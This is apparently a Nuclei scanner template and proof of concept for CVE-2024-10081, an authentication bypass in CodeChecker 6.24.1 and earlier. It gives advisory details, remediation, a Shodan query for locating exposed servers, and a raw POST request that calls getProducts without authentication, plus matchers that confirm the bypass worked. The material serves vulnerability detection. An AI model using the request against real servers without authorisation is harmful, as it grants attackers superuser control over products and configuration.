Authentication bypass occurs when the API URL ends with Authentication, Configuration or ServerInfo. This bypass allows superuser access to all API endpoints other than Authentication. These endpoints include the ability to add, edit, and remove products, among others.
PoC代码[已公开]
id: CVE-2024-10081
info:
name: CodeChecker <= 6.24.1 - Authentication Bypass
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Authentication bypass occurs when the API URL ends with Authentication, Configuration or ServerInfo. This bypass allows superuser access to all API endpoints other than Authentication. These endpoints include the ability to add, edit, and remove products, among others.
impact: |
Unauthenticated attackers can bypass authentication by crafting API URLs ending with specific keywords, gaining superuser access to all API endpoints including product management and configuration.
remediation: |
Upgrade CodeChecker to version 6.24.2 or later.
reference:
- https://github.com/advisories/GHSA-f3f8-vx3w-hp5q
- https://github.com/Ericsson/codechecker/security/advisories/GHSA-f3f8-vx3w-hp5q
- https://nvd.nist.gov/vuln/detail/CVE-2024-10081
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
cvss-score: 10
cve-id: CVE-2024-10081
cwe-id: CWE-288
epss-score: 0.65481
epss-percentile: 0.98438
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-1496590341
tags: cve,cve2024,code-checker,auth-bypass,vkev,vuln
http:
- raw:
- |
POST /v6.58/Products/Authentication HTTP/1.1
Host: {{Hostname}}
[1,"getProducts",1,1,{}]
matchers:
- type: dsl
dsl:
- 'contains(body,"{\"0\":{\"lst\":[\"rec\",")'
- "!contains(body,'Error code 401: Unauthorized')"
- "contains(header,'application/x-thrift')"
condition: and
# digest: 4b0a00483046022100a13495cdae20082cb7c28bc50392719a1a3d37425bdc1dd26929a9d5066a58a40221009573262cdda294fde87c548c983f033a88d6478fefc887248c6165a5b918b226:922c64590222798bb761d5b6d8e72950